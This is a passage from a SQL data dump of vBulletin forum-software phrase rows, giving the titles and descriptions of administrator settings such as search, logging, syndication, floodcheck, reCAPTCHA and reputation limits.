(39061, -1, 'setting_enablememberlist_title', 'vbsettings', 'Members List Enabled', 'vbulletin', 'vBulletin Solutions', 1195216840, '3.7.0 Beta 1'),
(39062, -1, 'setting_enablepms_desc', 'vbsettings', 'Turns the entire private messaging system on and off.', 'vbulletin', '', 0, ''),
(39063, -1, 'setting_enablepms_title', 'vbsettings', 'Private Messaging Enabled', 'vbulletin', '', 0, ''),
(39064, -1, 'setting_enablesearches_desc', 'vbsettings', 'Allow searching for posts and threads within the forums. This is a relatively server-intensive process so you may want to disable it if you have problems. \r\n \r\nTo disable searching of all forums, delete the option from the search_forums template.', 'vbulletin', 'vBulletin Solutions', 1226665251, '3.8.0 Beta 3'),
(39065, -1, 'setting_enablesearches_title', 'vbsettings', 'Search Engine Enabled', 'vbulletin', '', 0, ''),
(39066, -1, 'setting_enablespiders_desc', 'vbsettings', 'Enable the identification of search engine spiders.', 'vbulletin', '', 0, ''),
(39067, -1, 'setting_enablespiders_title', 'vbsettings', 'Enable Spider Display', 'vbulletin', '', 0, ''),
(39068, -1, 'setting_errorlogdatabase_desc', 'vbsettings', 'If you would like to log all database errors to a file, enter the path to the file here. The file will be saved as {filename}.log. \r\n \r\nErrors connecting to the database server will not be logged. \r\n \r\nPlease note that the directory in which this file is to be created must be writable by the web server.', 'vbulletin', 'vBulletin Solutions', 1209380708, '3.7.0'),
(39069, -1, 'setting_errorlogdatabase_title', 'vbsettings', 'Log Database Errors to a File', 'vbulletin', 'vBulletin Solutions', 1209380708, '3.7.0'),
(39070, -1, 'setting_errorlogemail_desc', 'vbsettings', 'If you would like to log all emails to a file, enter the path to the file here. The file will be saved as {filename}.log. You should only enable email logging if you suspect problems with the email system within vBulletin. \r\n \r\nPlease note that the directory in which this file is to be created must be writable by the web server.', 'vbulletin', 'vBulletin Solutions', 1146249389, '3.6.0 Beta 1'),
(39071, -1, 'setting_errorlogemail_title', 'vbsettings', 'Log Emails to a File', 'vbulletin', 'vBulletin Solutions', 1146249389, '3.6.0 Beta 1'),
(39072, -1, 'setting_errorlogmaxsize_desc', 'vbsettings', 'If you would like your vBulletin error logs to be rotated when they reach a certain size, enter the maximum file size in bytes here. 1048576 bytes = 1 megabyte. \r\n \r\nWhen a log file reaches this size, it will be renamed as {filename}{unix timestamp}.log and a new file will be created. \r\n \r\nSet this value to 0 to disable log rotation.', 'vbulletin', '', 0, ''),
(39073, -1, 'setting_errorlogmaxsize_title', 'vbsettings', 'Maximum File Size of Error Logs', 'vbulletin', '', 0, ''),
(39074, -1, 'setting_errorlogphp_desc', 'vbsettings', 'If you would like to log all PHP fatal errors to a file, enter the path to the file here. The file will be saved as {filename}.log. \r\n \r\nPlease note that the directory in which this file is to be created must be writable by the web server.', 'vbulletin', '', 0, ''),
(39075, -1, 'setting_errorlogphp_title', 'vbsettings', 'Log PHP Errors to a File', 'vbulletin', '', 0, ''),
(39076, -1, 'setting_errorlogsecurity_desc', 'vbsettings', 'If you would like to log all failed Admin Control Panel login attempts to a file, enter the path to the file here. The file will be saved as {filename}.log \r\n \r\nPlease note that the directory in which this file is to be created must be writable by the web server.', 'vbulletin', '', 0, ''),
(39077, -1, 'setting_errorlogsecurity_title', 'vbsettings', 'Log Failed Admin Control Panel Logins to a File', 'vbulletin', '', 0, ''),
(39078, -1, 'setting_externalcache_desc', 'vbsettings', 'This setting controls how long thread content will be cached (in minutes). Valid settings are 1 to 1440, anything else will be treated as the default value of 60. The higher this value is, the less resources will be used by the External Data Provider system.', 'vbulletin', 'vBulletin Solutions', 1150131648, '3.6.0 Beta 2'),
(39079, -1, 'setting_externalcache_title', 'vbsettings', 'Cache Lifespan', 'vbulletin', 'vBulletin Solutions', 1150131648, '3.6.0 Beta 2'),
(39080, -1, 'setting_externalcount_desc', 'vbsettings', 'This option limits the maximum amount of records that can be returned by the external data provider. By default 15 records will be returned. This option allows the user to tack on &count=X to their RSS feed to retrieve more records.', 'vbulletin', 'vBulletin Solutions', 1199365966, '3.7.0 Beta 4'),
(39081, -1, 'setting_externalcount_title', 'vbsettings', 'Maximum External Records', 'vbulletin', 'vBulletin Solutions', 1199365966, '3.7.0 Beta 4'),
(39082, -1, 'setting_externalcutoff_desc', 'vbsettings', 'This value controls how many days in the past that updated threads will be chosen from. Busy forums will want a smaller number. The smallest valid value is 1 day; the default is 30 days.', 'vbulletin', '', 0, ''),
(39083, -1, 'setting_externalcutoff_title', 'vbsettings', 'Thread Cutoff', 'vbulletin', '', 0, ''),
(39084, -1, 'setting_externaljs_desc', 'vbsettings', 'This setting allows you to enable/disable the Javascript content syndication system that allows you to embed vBulletin data in HTML pages.', 'vbulletin', '', 0, ''),
(39085, -1, 'setting_externaljs_title', 'vbsettings', 'Enable External Javascript', 'vbulletin', '', 0, ''),
(39086, -1, 'setting_externalrss_desc', 'vbsettings', 'This setting allows you to enable/disable the RSS content syndication system.', 'vbulletin', '', 0, ''),
(39087, -1, 'setting_externalrss_title', 'vbsettings', 'Enable RSS Syndication', 'vbulletin', '', 0, ''),
(39088, -1, 'setting_externalxml_desc', 'vbsettings', 'This setting allows you to enable/disable the XML content syndication system.', 'vbulletin', '', 0, ''),
(39089, -1, 'setting_externalxml_title', 'vbsettings', 'Enable XML Syndication', 'vbulletin', '', 0, ''),
(39090, -1, 'setting_faxnumber_desc', 'vbsettings', 'Fax number for your company. COPPA forms will be faxed to this number. \r\n \r\nYou may wish to check out http://www.efax.com/ .', 'vbulletin', 'vBulletin Solutions', 1205428305, '3.7.0 Release Candidate 1'),
(39091, -1, 'setting_faxnumber_title', 'vbsettings', 'Company Fax', 'vbulletin', 'vBulletin Solutions', 1205428305, '3.7.0 Release Candidate 1'),
(39092, -1, 'setting_floodchecktime_desc', 'vbsettings', 'You may prevent your users from flooding your forum with posts by activating this feature. \r\n \r\nBy enabling floodcheck, you disallow users from making another post within a given time span of their last posting. In other words, if you set a floodcheck time span of 30 seconds, a user may not post again within 30 seconds of making his last post. \r\n \r\nAdministrators and moderators are exempt from floodcheck. \r\n Recommended: 30 seconds. Type the number of seconds only. Enter 0 to disable this function.', 'vbulletin', 'vBulletin Solutions', 1199365477, '3.7.0 Beta 4'),
(39093, -1, 'setting_floodchecktime_title', 'vbsettings', 'Minimum Time Between Posts', 'vbulletin', 'vBulletin Solutions', 1199365477, '3.7.0 Beta 4'),
(39094, -1, 'setting_forumdisplaydepth_desc', 'vbsettings', 'This setting does the same job as the setting above, but this time for forumdisplay.php pages, rather than forum home.', 'vbulletin', 'vBulletin Solutions', 1199365741, '3.7.0 Beta 4'),
(39095, -1, 'setting_forumdisplaydepth_title', 'vbsettings', 'Depth of Forums - Forum Display', 'vbulletin', 'vBulletin Solutions', 1199365741, '3.7.0 Beta 4'),
(39096, -1, 'setting_forumhome_desc', 'vbsettings', 'This option allows you to set the script name of the page that acts as your forum home page. By default this will be \'index\' (meaning index.php but you may want to call it \'forum\' or whatever else you like for your own purposes. If you change this value you must manually rename the forumhome PHP script to match the new value.', 'vbulletin', '', 0, ''),
(39097, -1, 'setting_forumhome_title', 'vbsettings', 'Script Name for Forum Home Page', 'vbulletin', '', 0, ''),
(39098, -1, 'setting_forumhomedepth_desc', 'vbsettings', 'Depth to show forums on forum home forum listings. If you set this value to \'2\', forum listings will show the current forum level and any child forums one level below (etc.)', 'vbulletin', 'vBulletin Solutions', 1199365736, '3.7.0 Beta 4'),
(39099, -1, 'setting_forumhomedepth_title', 'vbsettings', 'Depth of Forums - Forum Home', 'vbulletin', 'vBulletin Solutions', 1199365736, '3.7.0 Beta 4'),
(39100, -1, 'setting_forumleaders_desc', 'vbsettings', 'Forum Leaders is a listing of your important user groups. The display of forum Moderators on this page is controlled with this option while the display of other groups is controlled via the usergroup manager.', 'vbulletin', '', 0, ''),
(39101, -1, 'setting_forumleaders_title', 'vbsettings', 'Enable Forum Leaders', 'vbulletin', '', 0, ''),
(39102, -1, 'setting_friends_per_page_desc', 'vbsettings', 'The Amount of Friends to show \"per page\" on the large friends list. \r\n \r\nNote: This number must be at least 1.', 'vbulletin', 'vBulletin Solutions', 1208954900, '3.7.0 Release Candidate 4'),
(39103, -1, 'setting_friends_per_page_title', 'vbsettings', 'Friends Per Page on Full Friends List', 'vbulletin', 'vBulletin Solutions', 1208954900, '3.7.0 Release Candidate 4'),
(39104, -1, 'setting_fulltextsearch_desc', 'vbsettings', 'Leave this setting alone.', 'vbulletin', 'vBulletin Solutions', 1216044654, '3.8.0 Alpha 1'),
(39105, -1, 'setting_fulltextsearch_title', 'vbsettings', 'Fulltext Search', 'vbulletin', 'vBulletin Solutions', 1216044654, '3.8.0 Alpha 1'),
(39106, -1, 'setting_globalignore_desc', 'vbsettings', 'This option allows you to effectively add a user or users to every member\'s \'Ignore List\'. However, users in this list can still see their own posts and threads... \r\n \r\nEnter a list of userid numbers, separated by spaces (for example: 4 12 68 102). \r\n If you change this option, you need to rebuild thread and then forum information here .', 'vbulletin', 'vBulletin Solutions', 1155668390, '3.6.1'),
(39107, -1, 'setting_globalignore_title', 'vbsettings', 'Tachy Goes to Coventry', 'vbulletin', 'vBulletin Solutions', 1155668390, '3.6.1'),
(39108, -1, 'setting_gm_maxchars_desc', 'vbsettings', 'Maximum characters to allow in a social group message. \r\n \r\nSet this to 0 for no limit.', 'vbulletin', 'vBulletin Solutions', 1225899821, '3.8.0 Beta 2'),
(39109, -1, 'setting_gm_maxchars_title', 'vbsettings', 'Maximum Characters Per Social Group Message', 'vbulletin', 'vBulletin Solutions', 1225899821, '3.8.0 Beta 2'),
(39110, -1, 'setting_gm_maxperpage_desc', 'vbsettings', 'This setting allows you to limit the number of messages users may display per page in the social groups. \r\n \r\nNote: This number must be at least 1.', 'vbulletin', 'vBulletin Solutions', 1218193352, '3.8.0 Alpha 1'),
(39111, -1, 'setting_gm_maxperpage_title', 'vbsettings', 'Maximum Messages Per-Page', 'vbulletin', 'vBulletin Solutions', 1218193352, '3.8.0 Alpha 1'),
(39112, -1, 'setting_gm_perpage_desc', 'vbsettings', 'This setting allows you to define the default number of messages displayed per-page in social groups. \r\n \r\nNote: This number must be at least 1.', 'vbulletin', 'vBulletin Solutions', 1218193341, '3.8.0 Alpha 1'),
(39113, -1, 'setting_gm_perpage_title', 'vbsettings', 'Default Messages Per-Page', 'vbulletin', 'vBulletin Solutions', 1218193341, '3.8.0 Alpha 1'),
(39114, -1, 'setting_goodwords_desc', 'vbsettings', 'If there are special words that are important for your forum but are outside the word length limits you specified above, you may enter them here so that they will be included in the search index. \r\n \r\nFor example, a web-programming forum with a minimum word length of 4 characters might want to include \'PHP\' in the search index, even though the word is only 3 characters long. \r\n \r\nSeparate each word with a space.', 'vbulletin', 'vBulletin Solutions', 1185233710, '3.6.8'),
(39115, -1, 'setting_goodwords_title', 'vbsettings', 'Words to be Included Despite Character Limit', 'vbulletin', 'vBulletin Solutions', 1185233710, '3.6.8'),
(39116, -1, 'setting_groupiconpath_desc', 'vbsettings', 'Leave this setting alone.', 'vbulletin', 'vBulletin Solutions', 1216827544, '3.8.0 Alpha 1'),
(39117, -1, 'setting_groupiconpath_title', 'vbsettings', 'Social Group Icon Path', 'vbulletin', 'vBulletin Solutions', 1216827544, '3.8.0 Alpha 1'),
(39118, -1, 'setting_groupiconurl_desc', 'vbsettings', 'Leave this setting alone.', 'vbulletin', 'vBulletin Solutions', 1216216892, '3.8.0 Alpha 1'),
(39119, -1, 'setting_groupiconurl_title', 'vbsettings', 'Social Group Icon URL', 'vbulletin', 'vBulletin Solutions', 1216216892, '3.8.0 Alpha 1'),
(39120, -1, 'setting_gziplevel_desc', 'vbsettings', 'Set the level of GZIP compression that will take place on the output. 0=none; 9=max. \r\n \r\nWe strongly recommend that you use level 1 for optimum results.', 'vbulletin', '', 0, ''),
(39121, -1, 'setting_gziplevel_title', 'vbsettings', 'GZIP Compression Level', 'vbulletin', '', 0, ''),
(39122, -1, 'setting_gzipoutput_desc', 'vbsettings', 'Selecting yes will enable vBulletin to GZIP compress the HTML output of pages, thus reducing bandwidth requirements. This will be only used on clients that support it, and are HTTP 1.1 compliant. There will be a small performance overhead. \r\n \r\nThis feature requires the ZLIB library. \r\n \r\nIf you are already using mod_gzip or mod_deflate on your server, do not enable this option.', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(39123, -1, 'setting_gzipoutput_title', 'vbsettings', 'GZIP HTML Output', 'vbulletin', '', 0, ''),
(39124, -1, 'setting_hometitle_desc', 'vbsettings', 'Name of your homepage. This appears at the bottom of every page.', 'vbulletin', '', 0, ''),
(39125, -1, 'setting_hometitle_title', 'vbsettings', 'Homepage Name', 'vbulletin', '', 0, ''),
(39126, -1, 'setting_homeurl_desc', 'vbsettings', 'URL of your home page. This appears at the bottom of every page.', 'vbulletin', 'vBulletin Solutions', 1205428684, '3.7.0 Release Candidate 1'),
(39127, -1, 'setting_homeurl_title', 'vbsettings', 'Homepage URL', 'vbulletin', 'vBulletin Solutions', 1205428684, '3.7.0 Release Candidate 1'),
(39128, -1, 'setting_hotnumberposts_desc', 'vbsettings', 'If \'Hot Threads\' are enabled, threads with the specified number of posts or more will be shown as hot.', 'vbulletin', 'vBulletin Solutions', 1199365773, '3.7.0 Beta 4'),
(39129, -1, 'setting_hotnumberposts_title', 'vbsettings', 'Hot Threads Qualifying Posts', 'vbulletin', 'vBulletin Solutions', 1199365773, '3.7.0 Beta 4'),
(39130, -1, 'setting_hotnumberviews_desc', 'vbsettings', 'If \'Hot Threads\' are enabled, threads with the specified number of views or more will be shown as hot.', 'vbulletin', 'vBulletin Solutions', 1199365769, '3.7.0 Beta 4'),
(39131, -1, 'setting_hotnumberviews_title', 'vbsettings', 'Hot Threads Qualifying Views', 'vbulletin', 'vBulletin Solutions', 1199365769, '3.7.0 Beta 4'),
(39132, -1, 'setting_hv_recaptcha_privatekey_desc', 'vbsettings', 'Private key provided to you by reCAPTCHA™ .', 'vbulletin', 'vBulletin Solutions', 1205929838, '3.7.0 Release Candidate 1'),
(39133, -1, 'setting_hv_recaptcha_privatekey_title', 'vbsettings', 'reCAPTCHA™ Private Key', 'vbulletin', 'vBulletin Solutions', 1205929909, '3.7.0 Release Candidate 1'),
(39134, -1, 'setting_hv_recaptcha_publickey_desc', 'vbsettings', 'Public key provided to you by reCAPTCHA™ .', 'vbulletin', 'vBulletin Solutions', 1206119450, '3.7.0 Release Candidate 2'),
(39135, -1, 'setting_hv_recaptcha_publickey_title', 'vbsettings', 'reCAPTCHA™ Public Key', 'vbulletin', 'vBulletin Solutions', 1205929918, '3.7.0 Release Candidate 1'),
(39136, -1, 'setting_hv_recaptcha_theme_desc', 'vbsettings', '', 'vbulletin', 'vBulletin Solutions', 1212065133, '3.7.2'),
(39137, -1, 'setting_hv_recaptcha_theme_title', 'vbsettings', 'reCAPTCHA™ Theme', 'vbulletin', 'vBulletin Solutions', 1212065133, '3.7.2'),
(39138, -1, 'setting_hv_type_desc', 'vbsettings', ' Choose the verification type that you wish to present to the user.
\r\n\r\nImage Verification
\r\nAn image consisting of letters in varying fonts/shapes/sizes will be shown to the user. The appearance of this image is dictated by several options that you may control.
\r\n\r\nQuestion and Answer Verification
\r\nQuestions provided by you that must be answered appropriately for verification.
\r\n\r\n\r\nAn image containing two words will be shown to the user. This verification supports audio, allowing blind users to register.
', 'vbulletin', 'vBulletin Solutions', 1206010161, '3.7.0 Release Candidate 2'),
(39139, -1, 'setting_hv_type_title', 'vbsettings', 'Human Verification Library', 'vbulletin', 'vBulletin Solutions', 1206010161, '3.7.0 Release Candidate 2'),
(39140, -1, 'setting_hvcheck_desc', 'vbsettings', 'Human Verification will be required for the selected actions where the user\'s usergroup permission Require Human Verification for Configured Actions is selected.', 'vbulletin', 'vBulletin Solutions', 1216638580, '3.8.0 Alpha 1'),
(39141, -1, 'setting_hvcheck_title', 'vbsettings', 'Human Verified Actions', 'vbulletin', 'vBulletin Solutions', 1216638580, '3.8.0 Alpha 1'),
(39142, -1, 'setting_ie8render7_desc', 'vbsettings', 'Sends an HTTP header that instructs Internet Explorer 8 to render pages as Internet Explorer 7 would do so, rather than enabling full standards-compliance mode, which may result in rendering problems for templates that have not been updated for IE8.', 'vbulletin', 'vBulletin Solutions', 1205154656, '3.7.0 Release Candidate 1'),
(39143, -1, 'setting_ie8render7_title', 'vbsettings', 'Send Internet Explorer 7 Compatibility Header', 'vbulletin', 'vBulletin Solutions', 1205154656, '3.7.0 Release Candidate 1'),
(39144, -1, 'setting_ignoremods_desc', 'vbsettings', 'Allow users to add Moderators and Administrators to their ignore list?', 'vbulletin', '', 0, ''),
(39145, -1, 'setting_ignoremods_title', 'vbsettings', 'Allow Users to \'Ignore\' Moderators', 'vbulletin', '', 0, ''),
(39146, -1, 'setting_ignorequotechars_desc', 'vbsettings', 'Setting this option to \'YES\' will cause the system to not count words in [QUOTE] tags towards the total number of characters posted. \r\n \r\nThe primary use for this is to prevent users posting messages with enormous quotes and a single short word of their own.', 'vbulletin', '', 0, ''),
(39147, -1, 'setting_ignorequotechars_title', 'vbsettings', 'Ignore Words in [QUOTE] Tags For Min Chars Check', 'vbulletin', '', 0, ''),
(39148, -1, 'setting_illegalusernames_desc', 'vbsettings', 'Enter names in here that you do not want people to be able to register. \r\n \r\nIf any of the names here are included within the username, the user will be told that there is an error. For example, if you make the name John illegal, the name John athan will also be disallowed. \r\n \r\nSeparate names by spaces.', 'vbulletin', 'vBulletin Solutions', 1201032890, '3.7.0 Beta 5'),
(39149, -1, 'setting_illegalusernames_title', 'vbsettings', 'Illegal User Names', 'vbulletin', 'vBulletin Solutions', 1201032890, '3.7.0 Beta 5'),
(39150, -1, 'setting_imagetype_desc', 'vbsettings', 'Choose the image processing library that vBulletin will use for processing thumbnails and avatars. GD is more widely available but ImageMagick is more robust, supporting more image types. ImageMagick must have a valid path chosen below.', 'vbulletin', 'vBulletin Solutions', 1205146984, '3.7.0 Release Candidate 1'),
(39151, -1, 'setting_imagetype_title', 'vbsettings', 'Image Processing Library', 'vbulletin', 'vBulletin Solutions', 1205146984, '3.7.0 Release Candidate 1'),
(39152, -1, 'setting_ipcheck_desc', 'vbsettings', 'Select the subnet mask which reflects the level of checking you wish to run against IP addresses when a session is being fetched.\r\n \r\nThis is useful if you have a large number of users who are behind transparent proxies and have an IP address that can change randomly between request such as AOL.\r\n \r\nThe more this is decreased the greater the security risk from session hijacking.', 'vbulletin', 'vBulletin Solutions', 1149076911, '3.6.0 Beta 1'),
(39153, -1, 'setting_ipcheck_title', 'vbsettings', 'Session IP Octet Length Check', 'vbulletin', 'vBulletin Solutions', 1153754394, '3.6.0 Release Candidate 3'),
(39154, -1, 'setting_keywords_desc', 'vbsettings', 'Enter the meta keywords for all pages. These are used by search engines to index your pages with more relevance.', 'vbulletin', 'vBulletin Solutions', 1163501730, '3.6.4'),
(39155, -1, 'setting_keywords_title', 'vbsettings', 'Meta Keywords', 'vbulletin', 'vBulletin Solutions', 1163501730, '3.6.4'),
(39156, -1, 'setting_kppower_desc', 'vbsettings', 'For every X points of reputation, users gain 1 point of reputation-altering power.', 'vbulletin', '', 0, ''),
(39157, -1, 'setting_kppower_title', 'vbsettings', 'Reputation Point Factor', 'vbulletin', '', 0, ''),
(39158, -1, 'setting_languageid_desc', 'vbsettings', 'Select the default language for your forums. This language will be used for all guests, and any members who have not expressed a language preference in their options.', 'vbulletin', 'vBulletin Solutions', 1156857278, '3.6.1'),
(39159, -1, 'setting_languageid_title', 'vbsettings', 'Default Language', 'vbulletin', 'vBulletin Solutions', 1156857278, '3.6.1'),
(39160, -1, 'setting_lastthreadchars_desc', 'vbsettings', 'This value will chop the title of the last thread posted down to a specific number of characters for its display on a forum listing. \r\n \r\nA value of 0 will not trim the titles at all.', 'vbulletin', 'vBulletin Solutions', 1199365752, '3.7.0 Beta 4'),
(39161, -1, 'setting_lastthreadchars_title', 'vbsettings', 'Last Thread Title Maximum Displayed Characters', 'vbulletin', 'vBulletin Solutions', 1199365752, '3.7.0 Beta 4'),
(39162, -1, 'setting_legacypostbit_desc', 'vbsettings', 'If you prefer the old-style postbit, using two vertical columns rather than the new horizontal layout, you can switch back to using that template with this switch. \r\n \r\nPlease note that if you enable this option and wish to customize the template, you should edit the \'postbit_legacy\' template rather than the \'postbit\'.', 'vbulletin', '', 0, ''),
(39163, -1, 'setting_legacypostbit_title', 'vbsettings', 'Use Legacy (Vertical) Postbit Template', 'vbulletin', '', 0, ''),
(39164, -1, 'setting_lightboxenabled_desc', 'vbsettings', 'Use the lightbox for quick display of attached image thumbnails rather than instantly loading the full size image on a new page.', 'vbulletin', 'vBulletin Solutions', 1199971810, '3.7.0 Beta 4'),
(39165, -1, 'setting_lightboxenabled_title', 'vbsettings', 'Use Image Lightbox', 'vbulletin', 'vBulletin Solutions', 1199971810, '3.7.0 Beta 4'),
(39166, -1, 'setting_linktopages_desc', 'vbsettings', 'Link to individual pages of a thread spanning multiple pages on the forum listing?', 'vbulletin', '', 0, ''),
(39167, -1, 'setting_linktopages_title', 'vbsettings', 'Multi-Page Thread Links Enabled', 'vbulletin', '', 0, ''),
(39168, -1, 'setting_loadlimit_desc', 'vbsettings', 'vBulletin can read the overall load of the server on certain *NIX setups (including Linux). \r\n \r\nThis allows vBulletin to determine the load on the server and processor, and to turn away further users if the load becomes too high. \r\n \r\nIf you do not want to use this option, set it to 0. \r\nA typical level would be 5.00 for a reasonable warning level.', 'vbulletin', '', 0, ''),
(39169, -1, 'setting_loadlimit_title', 'vbsettings', '*NIX Server Load Limit', 'vbulletin', '', 0, ''),
(39170, -1, 'setting_logdateformat_desc', 'vbsettings', 'Format of dates shown in Control Panel logs. See: http://www.php.net/manual-lookup.php?function=date ', 'vbulletin', '', 0, ''),
(39171, -1, 'setting_logdateformat_title', 'vbsettings', 'Log Date Format', 'vbulletin', '', 0, ''),
(39172, -1, 'setting_logip_desc', 'vbsettings', 'For security reasons, you may wish to display the IP address of the person posting a message.', 'vbulletin', '', 0, ''),
(39173, -1, 'setting_logip_title', 'vbsettings', 'Log IP Addresses', 'vbulletin', '', 0, ''),
(39174, -1, 'setting_magickpath_desc', 'vbsettings', 'Path to the ImageMagick 6 binaries (convert and identify ). Example: \r\nUnix: /usr/local/bin/ \r\nWindows: C:\\imagemagick\\', 'vbulletin', '', 0, ''),
(39175, -1, 'setting_magickpath_title', 'vbsettings', 'ImageMagick Binary Path', 'vbulletin', '', 0, ''),
(39176, -1, 'setting_markinglimit_desc', 'vbsettings', 'The amount of time in days to store the thread and forum read times. All threads or forums without posts in this many days will be considered read.', 'vbulletin', '', 0, ''),
(39177, -1, 'setting_markinglimit_title', 'vbsettings', 'Database Read Marking Limit', 'vbulletin', '', 0, ''),
(39178, -1, 'setting_maximages_desc', 'vbsettings', 'When a new post is submitted or edited vBulletin will check the number of images and smilies in the text and reject it if the number is greater than the value specified here. \r\n \r\nSet the value to 0 to disable this function.', 'vbulletin', 'vBulletin Solutions', 1149247777, '3.6.0 Beta 1'),
(39179, -1, 'setting_maximages_title', 'vbsettings', 'Maximum Images Per Post', 'vbulletin', 'vBulletin Solutions', 1149247777, '3.6.0 Beta 1'),
(39180, -1, 'setting_maxmultipage_desc', 'vbsettings', 'When linking to multiple pages in the forum display, this allows you to set the cut-off point on which long posts stop adding more page numbers and are replaced by \'more...\'', 'vbulletin', 'vBulletin Solutions', 1199365779, '3.7.0 Beta 4'),
(39181, -1, 'setting_maxmultipage_title', 'vbsettings', 'Multi-Page Thread Maximum Links', 'vbulletin', 'vBulletin Solutions', 1199365779, '3.7.0 Beta 4'),
(39182, -1, 'setting_maxpolllength_desc', 'vbsettings', 'Maximum length that a poll option can be.', 'vbulletin', 'vBulletin Solutions', 1199365630, '3.7.0 Beta 4'),
(39183, -1, 'setting_maxpolllength_title', 'vbsettings', 'Poll Option Length', 'vbulletin', 'vBulletin Solutions', 1199365630, '3.7.0 Beta 4'),
(39184, -1, 'setting_maxpolloptions_desc', 'vbsettings', 'Maximum number of options a user can select for the poll. \r\n \r\nSet this option to 0 to allow any number of options.', 'vbulletin', 'vBulletin Solutions', 1199365625, '3.7.0 Beta 4'),
(39185, -1, 'setting_maxpolloptions_title', 'vbsettings', 'Maximum Poll Options', 'vbulletin', 'vBulletin Solutions', 1199365625, '3.7.0 Beta 4'),
(39186, -1, 'setting_maxposts_desc', 'vbsettings', 'The number of posts to display on a thread page in linear or hybrid mode before splitting it over multiple pages. \r\n \r\nNote: This number must be at least 1.', 'vbulletin', 'vBulletin Solutions', 1208965583, '3.7.0 Release Candidate 4'),
(39187, -1, 'setting_maxposts_title', 'vbsettings', 'Maximum Displayed Posts Before Page Split', 'vbulletin', 'vBulletin Solutions', 1208965583, '3.7.0 Release Candidate 4'),
(39188, -1, 'setting_maxreputationperday_desc', 'vbsettings', 'How many reputation clicks can a user give over each 24 hour period? Administrators are exempt from this limit.', 'vbulletin', 'vBulletin Solutions', 1199365390, '3.7.0 Beta 4'),
(39189, -1, 'setting_maxreputationperday_title', 'vbsettings', 'Daily Reputation Clicks Limit', 'vbulletin', 'vBulletin Solutions', 1199365390, '3.7.0 Beta 4'),
(39190, -1, 'setting_maxresults_desc', 'vbsettings', 'Any search results over this number will be discarded.', 'vbulletin', 'vBulletin Solutions', 1199365658, '3.7.0 Beta 4'),
(39191, -1, 'setting_maxresults_title', 'vbsettings', 'Maximum Search Results to Return', 'vbulletin', 'vBulletin Solutions', 1199365658, '3.7.0 Beta 4'),
(39192, -1, 'setting_maxsearchlength_desc', 'vbsettings', 'For both vBulletin default search and Fulltext search, this option also limits the maximum size that of words that users can search for. \r\nFor example, if this is set to 15 then users can\'t search for 16 letter words. \r\nWhen using the vBulletin default search, this option limits the maximum size of indexed words. The larger this number is, the larger your search index, and conversely your database is going to be.\r\nYou can reduce the size of your database by decreasing this number and re-indexing here .', 'vbulletin', 'vBulletin Solutions', 1222169375, '3.8.0 Alpha 2'),
(39193, -1, 'setting_maxsearchlength_title', 'vbsettings', 'Search Index Maximum Word Length', 'vbulletin', 'vBulletin Solutions', 1222169375, '3.8.0 Alpha 2'),
(39194, -1, 'setting_maxthreads_desc', 'vbsettings', 'The number of threads to display on a forum page before splitting it over multiple pages. \r\n \r\nNote: This number must be at least 1.', 'vbulletin', 'vBulletin Solutions', 1208965530, '3.7.0 Release Candidate 4'),
(39195, -1, 'setting_maxthreads_title', 'vbsettings', 'Maximum Displayed Threads Before Page Split', 'vbulletin', 'vBulletin Solutions', 1208965530, '3.7.0 Release Candidate 4'),
(39196, -1, 'setting_maxuserlength_desc', 'vbsettings', 'Enter the maximum number of characters in a valid username, for the purpose of ensuring that new members create valid usernames.', 'vbulletin', 'vBulletin Solutions', 1199365219, '3.7.0 Beta 4'),
(39197, -1, 'setting_maxuserlength_title', 'vbsettings', 'Maximum Username Length', 'vbulletin', 'vBulletin Solutions', 1199365219, '3.7.0 Beta 4'),
(39198, -1, 'setting_memberlistfields_desc', 'vbsettings', 'What user profile fields should be shown on the member list page?', 'vbulletin', 'vBulletin Solutions', 1195216840, '3.7.0 Beta 1'),
(39199, -1, 'setting_memberlistfields_title', 'vbsettings', 'Member List Field Options', 'vbulletin', 'vBulletin Solutions', 1195216840, '3.7.0 Beta 1'),
(39200, -1, 'setting_memberlistperpage_desc', 'vbsettings', 'The number of records per page that will be shown by default in the members list before the results are split over multiple pages. \r\n \r\nNote: This number must be at least 1.', 'vbulletin', 'vBulletin Solutions', 1208966091, '3.7.0 Release Candidate 4'),
(39201, -1, 'setting_memberlistperpage_title', 'vbsettings', 'Members Per Page', 'vbulletin', 'vBulletin Solutions', 1208966091, '3.7.0 Release Candidate 4'),
(39202, -1, 'setting_memberlistposts_desc', 'vbsettings', 'You can define a minimum post count that a user must reach before they are displayed on the memberlist.', 'vbulletin', 'vBulletin Solutions', 1199365413, '3.7.0 Beta 4'),
(39203, -1, 'setting_memberlistposts_title', 'vbsettings', 'Minimum Posts', 'vbulletin', 'vBulletin Solutions', 1199365413, '3.7.0 Beta 4'),
(39204, -1, 'setting_minifriends_amount_desc', 'vbsettings', 'The Number of Friends to display in the Small Friends Block on the Users\' Profile Pages', 'vbulletin', 'vBulletin Solutions', 1199365251, '3.7.0 Beta 4'),
(39205, -1, 'setting_minifriends_amount_title', 'vbsettings', 'Number of friends to display in the small friends block', 'vbulletin', 'vBulletin Solutions', 1199365251, '3.7.0 Beta 4'),
(39206, -1, 'setting_minreputationcount_desc', 'vbsettings', 'How much reputation must a user have before his reputation hits count on others?', 'vbulletin', '', 0, ''),
(39207, -1, 'setting_minreputationcount_title', 'vbsettings', 'Minimum Reputation Count', 'vbulletin', '', 0, ''),
(39208, -1, 'setting_minreputationpost_desc', 'vbsettings', 'How many posts must a user have before his reputation hits count on others?', 'vbulletin', '', 0, ''),
(39209, -1, 'setting_minreputationpost_title', 'vbsettings', 'Minimum Post Count', 'vbulletin', '', 0, ''),
(39210, -1, 'setting_minsearchlength_desc', 'vbsettings', 'When using the vBulletin default search, this option limits the size of indexed words. The smaller this number is, the larger your search index, and conversely your database is going to be. When using the Fulltext search, this option limits the size of words that may be searched for. Smaller words take longer to search for as they are more common. MySQL Fulltext has its own minimum word length as well that must be changed at the server level.', 'vbulletin', 'vBulletin Solutions', 1199365664, '3.7.0 Beta 4'),
(39211, -1, 'setting_minsearchlength_title', 'vbsettings', 'Search Index Minimum Word Length', 'vbulletin', 'vBulletin Solutions', 1199365664, '3.7.0 Beta 4'),
(39212, -1, 'setting_minuserlength_desc', 'vbsettings', 'Enter the minimum number of characters in a valid username, for the purpose of ensuring that new members create valid usernames.', 'vbulletin', 'vBulletin Solutions', 1199365212, '3.7.0 Beta 4'),
